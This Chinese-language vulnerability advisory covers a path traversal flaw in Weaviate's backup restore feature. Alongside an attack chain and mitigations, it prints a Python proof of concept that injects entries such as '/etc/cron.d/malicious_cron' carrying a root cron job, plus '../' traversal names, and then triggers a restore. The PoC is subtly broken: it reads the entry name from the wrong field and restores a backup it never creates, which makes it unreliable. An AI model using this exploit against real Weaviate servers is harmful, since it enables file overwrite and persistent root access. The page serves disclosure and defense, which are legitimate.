CVE-2025-67818: Weaviate OSS路径遍历漏洞导致任意文件写入

漏洞信息

漏洞编号

CVE-2025-67818

漏洞类型

路径遍历/目录穿越

CVSS评分

7.2 高危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

Weaviate OSS

漏洞概述

CVE-2025-67818是Weaviate开源向量数据库中的一个高危安全漏洞，CVSS评分达到7.2。该漏洞存在于Weaviate OSS 1.33.4之前版本的备份恢复功能中，攻击者利用路径遍历技术可以逃逸备份根目录限制，在应用程序权限范围内任意创建或覆写系统文件。漏洞的触发需要攻击者具备数据库数据插入权限，属于高权限攻击场景。由于Weaviate通常以较高权限运行，攻击成功后可能导致严重的系统安全后果，包括配置文件篡改、敏感数据泄露甚至远程代码执行。漏洞于2025年12月12日披露，官方已在1.33.4版本中完成修复，建议所有使用受影响版本的用户立即升级。

技术细节

该漏洞的根本原因在于Weaviate备份恢复功能对文件名和路径缺乏有效的安全验证。攻击者在向数据库插入数据时，可以在entry name字段中构造特殊路径字符串：1）使用绝对路径如/etc/...直接指向系统关键目录；2）使用相对路径遍历如../../..向上回溯目录结构。当执行备份恢复操作时，Weaviate会将这些恶意构造的路径直接用于文件写入操作，而未进行路径规范化或边界检查。攻击成功的关键条件包括：具备数据插入权限、备份恢复功能启用、目标路径可写。攻击者可以通过精心构造的payload覆写应用程序配置文件、SSH authorized_keys、crontab任务等敏感文件，从而实现持久化控制或权限提升。此漏洞属于CWE-22路径遍历（Path Traversal）类别，与CWE-23相对路径遍历和CWE-36绝对路径遍历相关。

攻击链分析

STEP 1

1. 侦察阶段

攻击者识别目标环境中运行的Weaviate版本，确认版本低于1.33.4，并确认具备数据插入权限

STEP 2

2. 载荷构造

攻击者构造包含路径遍历payload的数据条目，使用绝对路径(/etc/...)或相对路径(../../..)绕过备份根目录限制

STEP 3

3. 数据注入

通过Weaviate API将恶意构造的entry_name插入数据库，利用数据插入权限完成初始入侵

STEP 4

4. 备份操作

创建包含恶意条目的备份，或直接触发备份恢复流程，诱导系统处理恶意路径

STEP 5

5. 文件写入

备份恢复过程中，Weaviate未验证路径合法性，直接将数据写入攻击者指定的任意位置

STEP 6

6. 权限提升/持久化

成功覆写系统文件如/etc/crontab、authorized_keys等，实现远程代码执行或持久化控制

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-67818 PoC - Path Traversal in Weaviate Backup Restore
# Affected: Weaviate OSS < 1.33.4
# Note: Requires authenticated access with data insertion privileges

import requests
import json
import base64

TARGET = "http://target-weaviate:8080"
API_KEY = "your-api-key"  # Authentication required

headers = {
    "Authorization": f"Bearer {API_KEY}",
    "Content-Type": "application/json"
}

# Method 1: Absolute path traversal to write to /etc/
payload_absolute = {
    "class": "MaliciousClass",
    "properties": {
        "entry_name": "/etc/cron.d/malicious_cron",
        "content": base64.b64encode(b"* * * * * root /tmp/payload.sh\n").decode()
    }
}

# Method 2: Relative path traversal using ../.. to escape backup root
payload_traversal = {
    "class": "MaliciousClass",
    "properties": {
        "entry_name": "../../../../../../tmp/pwned",
        "content": base64.b64encode(b"Malicious content written outside backup root\n").decode()
    }
}

# Insert malicious entries into Weaviate
def inject_malicious_data(payload, class_name="ExploitClass"):
    url = f"{TARGET}/v1/objects"
    data = {
        "class": class_name,
        "properties": {
            "entry_name": payload.get("entry_name"),
            "file_content": payload.get("content")
        }
    }
    response = requests.post(url, headers=headers, json=data)
    return response.status_code == 200

# Trigger backup restore (requires admin privileges or backup restore API access)
def trigger_backup_restore(backup_id="malicious_backup"):
    url = f"{TARGET}/v1/backups/{backup_id}/restore"
    response = requests.post(url, headers=headers)
    return response.json()

# Execute exploitation
if __name__ == "__main__":
    print("[+] Injecting malicious path traversal entries...")
    inject_malicious_data(payload_absolute)
    inject_malicious_data(payload_traversal)
    
    print("[+] Triggering backup restore to write arbitrary files...")
    result = trigger_backup_restore()
    print(f"[+] Result: {json.dumps(result, indent=2)}")

影响范围

Weaviate OSS < 1.33.4

防御指南

临时缓解措施

如果无法立即升级，可采取以下临时缓解措施：1）禁用或限制备份恢复功能的访问权限，仅允许受信任的管理员操作；2）使用防火墙或网络隔离限制对Weaviate API的访问；3）监控和阻止异常的路径遍历请求模式；4）对Weaviate进程应用seccomp或AppArmor安全配置文件限制文件系统访问；5）考虑使用容器化部署并限制容器权限，防止攻击逃逸。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-67818
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-67818
3 Details https://www.cvedetails.com/cve/CVE-2025-67818/
4 VulDB https://vuldb.com/cve/CVE-2025-67818
5 Link https://github.com/weaviate/weaviate
6 Link https://weaviate.io/blog/weaviate-security-release-november-2025